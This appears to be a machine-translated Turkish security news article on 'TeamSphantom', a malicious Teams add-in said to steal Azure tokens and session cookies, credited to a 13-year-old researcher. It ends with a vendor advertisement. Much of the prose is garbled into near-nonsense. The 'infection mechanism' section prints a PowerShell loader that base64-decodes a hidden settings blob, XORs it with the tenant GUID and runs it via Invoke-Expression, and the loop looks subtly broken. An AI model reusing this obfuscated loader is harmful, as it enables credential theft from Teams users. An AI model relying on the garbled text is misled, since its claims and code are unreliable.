
Haziran başlarında “TeamSphantom” kötü amaçlı yazılımlarının ani ortaya çıkması okul bölgelerini ve çok uluslu şirketleri salladı.
Zararsız bir Microsoft Teams eklentisi olarak maskelenen tehdit, Azure reklam yenileme tokenlerini ve oturum çerezlerini sifonlayan çok aşamalı bir yükleyiciyi kenar yüklemek için meşru toplantı davetlerini silahlandırdı.
Kırk sekiz saat içinde, telemetri 24.000’den fazla uç noktada problama aktivitesi gösterirken, kırmızı takım simülasyonları kötü amaçlı yazılımların SharePoint ve OneDrive kaynaklarına dönüşme yeteneğini doğruladı.
Anormal grafik API telaşına rağmen, SOC gösterge panolarını aydınlatmaya çağırdı, trafiği daha önce görünmeyen bir jeton yeniden oyun tekniğiyle ilişkilendiren 13 yaşındaki Dylan-çok sayıda sorumlu açıklama için kutlandı.
Microsoft analistleri, kampanyanın kiracı yöneticilerini taklit etmek, Dylan’ın bulgularını doğrulamak ve acil bir yayından kaldırma penceresini tetiklemek için kampanyanın konuşma web şeridini belirgin bir şekilde kötüye kullandığını kaydetti. Saldırganın mızrak-aktı zinciri, yükselişi ayrıcalıklı hale getirmeye davet ediyor.
Etki değerlendirmeleri, tescilli belgelerin ve ekiplerin sohbet geçmişlerinin seçici olarak açıklanmasını ortaya koyarak entelektüel mülk sızıntısı konusundaki endişeleri yoğunlaştırır.
Mağdurlar, mavi takımların eklentinin hashed manifestine doğru avlanmasına izin veren göstergeler olan Phantom Takvim girişleri ve haydut kanallar bildirdi.
Dylan’ın eylem sonrası özeti, korumasız bırakıldığında arayüz genişletilebilirliğinin yüksek etkili bir saldırı yüzeyi haline geldiği konusunda uyarıyor. Bu şeyler, düşmanın tekrar döngüsünü Microsoft’un sıfır tröst sütunlarına karşı eşleştirir.
Haftanın sonuna kadar Microsoft, 187 uzatılmış kod imzalama sertifikalarını iptal etti ve mağaza tarafı doğrulamasını sıkılaştırdı.
Yine de kopya kedi varyantları zaten yeni gizleme katmanlarını araştırıyor ve suçlu takımların ne kadar hızlı geliştiğini gösteriyor.
Şimdi MSRC’nin kötü amaçlı yazılım oyun kitaplarına en genç katkıda bulunan Dylan, istenmeyen eklenti tezahürlerini işaretleyen-taze gözlerin yerleşik tehdit-intel paradigmalarını yükseltebileceğini geçiren tespit mantığını ortak yazmaya başladı.
Enfeksiyon mekanizması
Makro yüklü ofis damlalarından farklı olarak, TeamSphantom bootstrapper’ını baz 64 kodlu bir appSettings
Takımların müşterilerin başlangıçta ayrıştırdığını engelleyin.
Blob, AMSI görünürlüğünü kırparak kısıtlı dil modunda çalışan gizlenmiş bir PowerShell yükleyicisine genişler. Bellek ikametgahı, yükleyici C2 listesini, her baytın kiracının kendi kılavuzuyla xor-ing ile şifresini çözer-statik göstergeleri yenen kurnaz bir hile.
38 satırlık bir JavaScript modülü daha sonra onMessageReceived
İşleyicinin kimlik doğrulama çerezlerini gerçek zamanlı olarak hasat etmesi.
$guid = (Get-AzureADTenantDetail).ObjectId
$appCfg = Get-Content "$Env:APPDATA\\Microsoft\\Teams\\appSettings.json" | ConvertFrom-Json
$bytes = [Convert]::FromBase64String($appCfg.bootstrap)
$decoded = -join ($bytes | % { $_ -bxor ($guid.ToByteArray()[$_-1]) })
Invoke-Expression ([Text.Encoding]::UTF8.GetString($decoded))
Microsoft’un yaması, manifest-validasyon boşluğunu kapatır, ancak savunuculardan kiracı çapında eklenti kayıtlarını izlemeleri ve komut dosyası bloklarında GUID tabanlı XOR döngüleri avlamaları istenir.
Canlı kötü amaçlı yazılım davranışını araştırın, bir saldırının her adımını izleyin ve daha hızlı, daha akıllı güvenlik kararlarını alın -> Herhangi birini deneyin. Şimdi